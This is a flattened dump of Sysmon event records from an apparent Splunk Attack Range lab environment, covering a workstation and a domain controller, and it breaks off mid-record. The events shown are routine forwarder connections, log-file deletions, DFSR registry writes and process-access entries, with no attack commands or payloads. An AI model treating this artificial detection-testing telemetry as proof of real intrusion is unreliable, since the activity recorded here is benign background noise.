354300x8000000000000000216243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:37.486{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51315-false10.0.1.12-8000- 23542300x8000000000000000216242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:39.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=727C6DFA2EF65C023005660E45F0F183,SHA256=C36219210BB81FF6A349DD369202E6421AD93B5702EA560107621374FC5CF2B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:39.197{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53408-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000287316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:38.586{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53407-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:40.519{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA58B9B3572E51F87246273FBCC53014,SHA256=9F54E2B6C1DE748E59B2D9EC0EB2EDCA7CEC6F2F7E4154F505D1FDF97EF07F15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:40.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D1C2EA238D3671C5F9BB123B2B4E11,SHA256=A354D0BE9E618CE59B1FD4828E44EF83F06FBE8541DF9D6D27851005F0019A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:41.623{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BE4C0737C9CFDF22F4CB4CE4208BD1,SHA256=D207B481EA5563CF6743B74D7A37AC2B5DB0B473A1D4C1D946A43F30597C0619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:41.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC94F6F3951AA12C59B19E1CD664E106,SHA256=6053671B84DCA55171F7FC1C7E0EFBC79756D302A159933F5692CB838901B040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:41.107{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E2508F4B9BBF97C796750CE994C9C58,SHA256=945B1505CA87945B4F61EAE13CD316DF329B2C9A3CEFC34FB4112BD3B1604787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:41.107{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F44583AD667FAC6200EE42B649BCB37,SHA256=23235B984598A143FED246CB15C679C019868A1906DC5FC539B10D8EA70BCE55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:42.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059692484330EE8616BC37E2E1E91F9A,SHA256=B1D5564512B647721E96C253FC8EA702F6530710345A7383DDB922D17266FD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:42.685{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0BD9CB4B1707847A372321FB5174383,SHA256=3A3BE203C9A1C69ADCA9810AAFFB870ED62F2D3D25918117280C1DED7B7B1135,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:43.920{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=954B17AD47BAEA5A4337BB5AC0936511,SHA256=7CB448A841540D998C83CB128260C7E3915A4227EB1EEE5DB073A5F291C0838D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:43.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B7DA99ECB1C8DBEE1C8FBA73531F57F,SHA256=C7241A2BFD5D7B6279F5E6E8F5FE57478E28E3E05309782FBFDF2CDFD937D424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:44.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40CC00AF0A505F9EF1084443CDE78B6A,SHA256=97E73A6E52A16ACA1F6DED9CDD2789D265ECE38C106E80DB6657ABC1C6293D77,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000287329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:48:45.879{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6FC0DF5C-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6FC0DF5C-0000-0000-0000-100000000000.XML 13241300x8000000000000000287328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:48:45.879{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Config SourceDWORD (0x00000001) 13241300x8000000000000000287327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:48:45.879{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\BA30863B-E0B8-488B-829D-A0E9DE6AE59C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_BA30863B-E0B8-488B-829D-A0E9DE6AE59C.XML 10341000x8000000000000000287326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.863{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.863{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.832{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7AF066B794DBB683A37A8AF22259B5D,SHA256=1BBDF01DB08BA94531B33F9AEF19ADEEA2971C06243079D87E08B8959B670C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.951{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.592{4F8D34B0-110D-6216-4904-000000003902}32121156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-110D-6216-4904-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216263Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216262Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216261Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-110D-6216-4904-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.232{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-110D-6216-4904-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.233{4F8D34B0-110D-6216-4904-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.139{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 